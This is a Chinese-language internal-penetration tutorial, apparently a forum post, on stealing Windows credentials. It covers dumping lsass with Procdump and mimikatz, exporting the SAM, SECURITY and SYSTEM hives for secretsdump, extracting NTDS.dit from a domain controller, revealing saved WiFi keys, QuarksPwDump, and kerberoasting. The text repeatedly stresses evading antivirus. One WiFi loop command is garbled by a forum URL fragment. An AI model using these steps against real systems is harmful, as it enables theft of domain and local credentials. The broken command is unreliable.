内网渗透---明文和hash的获取

利用Procdump+mimikatz配合获取hash与明文

Procdump是微软官方发布的工具 可以绕过大多数的防护软件使用该工具 procdump.exe把进程lsass.exe
的内存dump下来 而在使用mimikatz时很有可能被查杀，所以先使用procdump工具 将获取的lsass.dmp
拷贝到本机上，再使用mimikatz获取hash与明文。
下载地址：https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
进程lsass.exe中存在密码信息 使用Procdump获取lsass.dmp


将lsass.dmp导出到本机后，使用mimikatz获取明文密码 这样就可以不用将mimikatz传入
到目标机中可以绕过大多数防护软件。
privilege::debug 提升权限
sekurlsa::minidump lsass.dmp 用mimikatz载入lsass.dmp
sekurlsa::logonPasswords full   获取明文密码和hash



利用secretsdump获取明文密码

SAM(安全账户管理器 SAM存放在注册表中 SAM用来存储Windows操作系统密码的数据库文件为了避免明文密码
泄露 SAM文件中保存的是明文密码经过一系列算法处理过的Hash值，被保存的Hash分为LM Hash已废弃和NTLM
Hash 长度32bit由字母数字组成。,现在用户凭证是以NTLM HASH形式保存。在用户在本地或者远程登陆系统时会
将Hash值与SAM文件中保存的Hash值进行对比。在后期的Windows系统中，SAM文件中被保存的密码Hash都被
密钥SYSKEY加密。

使用该方法的好处：可以不用在目标主机上上传任何的文件 只需要将湖区的文件导出到自己
本机进行处理可以绕过防护软件
首先利用注册表命令将目标机的sam或者system文件导出
reg save hklm\sam C:\sam.save
reg save hklm\security C:\security.save
reg save hklm\system C:\system.save


secretsdump获取明文密码
将文件拷贝到我们自己的主机 这样可以不用在目标机上使用工具包 不用考虑免杀和环境问题 因为以上命令都是系统自带
使用secretsdump需要在python环境下，用impacket的 secretsdump脚本加载，在运行脚本时，需要将这些文件全部
放在同一目录。并且需要先安装impacket模块，Python脚本才能正确运行。
secretsdum下载地址：https://pan.baidu.com/s/17RuNdxdFmTUfRS50rZESRQ
提取码：4534


secretsdumps.py -sam sam.save -security security.save -system system.save LOCAL
可以观察到各种数据库的密码显示出来


NTDS.dit获取域控hash

Windows系统为了保证用户明文密码不会被泄漏，将密码转换为HASH值进行身份验证，被保存在SAM或者ntds.dit中
mimitakz，procdump等等 域中的所有账号密码存放在Ntds.dit 如果拿到 相当于拿到整个域权限。这个思路在域渗透
中尤为重要，因为这里面包含着所有域用户的hash，当然该思路只对DC生效。使用该方法不用担心被杀毒软件查杀因
为不需要上传任何工具去目标机上。
手动导出NTDS.dit和System
ntdsutil "ac i ntds" ifm "create full c:\users\tmp" q q


提取用户hash,这里推荐使用NTDSDumpEx：
下载地址：https://github.com/zcgonvh/NTDSDumpEx/releases
NTDSDumpEx -d ntds.dit -s system -o domain.txt


保存的hash


利用系统自带命令获取WIFI密码

使用系统自带命令不用担心杀毒软件查杀

netsh wlan show profiles 系统命令获取登录过的WiFi名称


netsh wlan show profile name="TP-LINK_5358" key=clear

获取TP-LINK_5358中的WiFi密码


通过如下命令获取连接过的wifi密码：
for /f  "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles')  do  home.php?mod=space
&uid=46675 %j | findstr -i -v echo |  netsh wlan show profiles %j key=clear


利用WCE抓取hash
Quarks PwDump 是开放源代码的 Windows 用户获取工具 这款工具是一款Hash注入神器 不仅可以用于Hash注
入也可以直接获取明文或Hash。这款工具也分为32位和64位两个不同的版本 它可以抓取windows平台下多种类
型的用户凭据包括：本地帐户、域帐户、缓存的域帐户和Bitlocker。但使用Quarks PwDump有可能被查杀因为
毕竟不是微软官方的工具，并且需要powershell环境。
下载地址：https://pan.baidu.com/s/1JhI-ZWRC1O1_G2pb53KS1A
提取码：dzgw
http://code.google.com/p/quarkspwdump/（需要翻墙下载）
各个选项


QuarksPwDump -dhl  获取本地的hash


QuarksPwDump -dhdc  获取域内的hash值


利用kerberoast+mimikatz配合获取明文密码

SPN 服务主体名service principal name 是微软为了在域环境中方便管理资源而为每种资源分配设计的一种表示方法
或者说SPN是使用Kerberos身份验证的网络中唯一的标识符，凡是使用Kerberos身份验证的网络中，都必须在机器账
号或用户账号下为服务注册SPN 每个使用Kerberos的服务都需要一个SPN 在内网中，SPN扫描通过查询向域控服务器
执行服务发现。这对于红队而言 可以帮助他们识别正在运行重要服务的主机，如终端 交换机等。SPN的识别是
kerberoasting攻击的第一步。

使用该方法有两个缺点：1.需要powershell    2.mimikatz容易被杀毒软件查杀
查看指定域ROOTKIT.ORG注册的SPN：setspn -T ROOTKIT.ORG -Q */* 如果指定域
不存在则默认切换到查找本域的SPN


setspn -q */*    获取所有服务


这里搜索MSSQL服务

Setspn -q */* | findstr “MSSQL


请求SPN
Add-Type -AssemblyName System.IdentityModel
New-Objec System.IdentityModel.Tokens.KerberosRequestorSecurityTok
en -ArgumentList "MSSQLSvc/Srv-Web-Kit.rootkit.org:1433"


将票据导出

kerberos::list /export



查看所有的票据


使用kerberoast获取明文密码
kerberoast下载地址：https://github.com/nidem/kerberoast
在运行时需要在python3以上的环境运行 不然会报错


利用mimikatz获取明文和hash

mimikatz https://github.com/gentilkiwi/mimikatz/releases/ 用于破解计算机中的账号密码